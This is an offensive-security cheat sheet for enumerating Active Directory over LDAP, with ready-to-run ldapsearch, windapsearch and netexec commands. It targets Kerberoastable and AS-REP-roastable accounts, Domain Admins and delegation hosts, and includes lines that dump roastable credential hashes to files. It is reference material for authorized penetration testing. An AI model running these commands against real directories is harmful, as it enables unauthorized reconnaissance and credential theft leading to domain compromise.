LDAP-ENUM
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
LDAP is the query protocol underneath Active Directory. It is the enumeration primitive behind BloodHound, Kerberoasting target discovery, and AD recon. This sheet covers ldapsearch, windapsearch, and nxc/ldeep for directory enumeration.
CONNECTION BASICS#
ldapsearch -x -H ldap://<dc-ip> -s base # Anonymous root DSE
ldapsearch -x -H ldap://<dc-ip> -s base namingContexts
# Get base DN
ldapsearch -x -H ldap://<dc-ip> -b "DC=corp,DC=lu"
# Anonymous bind
ldapsearch -x -H ldaps://<dc-ip>:636 # LDAPS (TLS)
# Authenticated (simple bind):
ldapsearch -x -H ldap://<dc-ip> \
-D "user@corp.lu" -w "Password1" -b "DC=corp,DC=lu"
ROOT DSE / DOMAIN INFO#
ldapsearch -x -H ldap://<dc> -s base '(objectclass=*)' ldapsearch -x -H ldap://<dc> -s base namingContexts defaultNamingContext ldapsearch -x -H ldap://<dc> -s base supportedLDAPVersion ldapsearch -x -H ldap://<dc> -s base dnsHostName serverName
USER ENUMERATION#
ldapsearch -x -H ldap://<dc> -D "$U" -w "$P" -b "$BASE" \ "(objectClass=user)" sAMAccountName ldapsearch ... "(&(objectClass=user)(objectCategory=person))" \ sAMAccountName description memberOf # Users with SPN (Kerberoastable): ldapsearch ... "(&(objectClass=user)(servicePrincipalName=*))" \ sAMAccountName servicePrincipalName # AS-REP roastable (no preauth): ldapsearch ... "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" \ sAMAccountName
GROUP ENUMERATION#
ldapsearch ... "(objectClass=group)" sAMAccountName member # Domain Admins members: ldapsearch ... "(&(objectClass=group)(cn=Domain Admins))" member # Nested group membership of a user: ldapsearch ... "(sAMAccountName=<user>)" memberOf
COMPUTER & DELEGATION#
ldapsearch ... "(objectClass=computer)" \ dNSHostName operatingSystem sAMAccountName # Unconstrained delegation (TRUSTED_FOR_DELEGATION): ldapsearch ... "(userAccountControl:1.2.840.113556.1.4.803:=524288)" # Constrained delegation targets: ldapsearch ... "(msDS-AllowedToDelegateTo=*)" \ sAMAccountName msDS-AllowedToDelegateTo
USEFUL UAC BIT FILTERS#
# Disabled accounts: :=2 # Password never expires: :=65536 # No preauth (AS-REP): :=4194304 # Trusted for delegation: :=524288 # Syntax: (userAccountControl:1.2.840.113556.1.4.803:=<bit>)
WINDAPSEARCH#
windapsearch -d corp.lu --dc-ip <dc> -u <user> -p <pass> -U
# All users
windapsearch ... --computers # All computers
windapsearch ... --groups # All groups
windapsearch ... --da # Domain Admins
windapsearch ... --privileged-users # Privileged users
windapsearch ... --unconstrained-users # Unconstrained deleg
windapsearch ... --admin-objects # AdminSDHolder objects
NETEXEC (nxc) LDAP#
nxc ldap <dc> -u <user> -p <pass> --users # Enumerate users nxc ldap <dc> -u <user> -p <pass> --groups # Groups nxc ldap <dc> -u <user> -p <pass> --kerberoasting out.txt nxc ldap <dc> -u <user> -p <pass> --asreproast out.txt nxc ldap <dc> -u <user> -p <pass> --trusted-for-delegation nxc ldap <dc> -u <user> -p <pass> -M ldap-checker # Signing/channel binding
EXAMPLES#
# Anonymous discovery of the base DN ldapsearch -x -H ldap://10.0.0.1 -s base namingContexts # Dump all Kerberoastable service accounts ldapsearch -x -H ldap://dc -D "$U" -w "$P" -b "DC=corp,DC=lu" \ "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName # One-shot roast + AS-REP hunt with netexec nxc ldap dc -u svc -p 'Pass' --kerberoasting k.txt --asreproast a.txt # Find unconstrained delegation hosts (high-value pivots) windapsearch -d corp.lu --dc-ip 10.0.0.1 -u u -p p --unconstrained-users
NOTES#
- Anonymous binds are often disabled; expect to need creds - LDAP signing / channel binding enforcement blocks relay - the nxc ldap-checker module reports this posture - The 1.2.840.113556.1.4.803 OID is the AND bitwise match rule - Feed SPN/AS-REP output into KERBEROASTING.txt workflows - ldeep is a strong alternative for structured JSON dumps - Prefer LDAPS (636) to avoid credentials in cleartext on the wire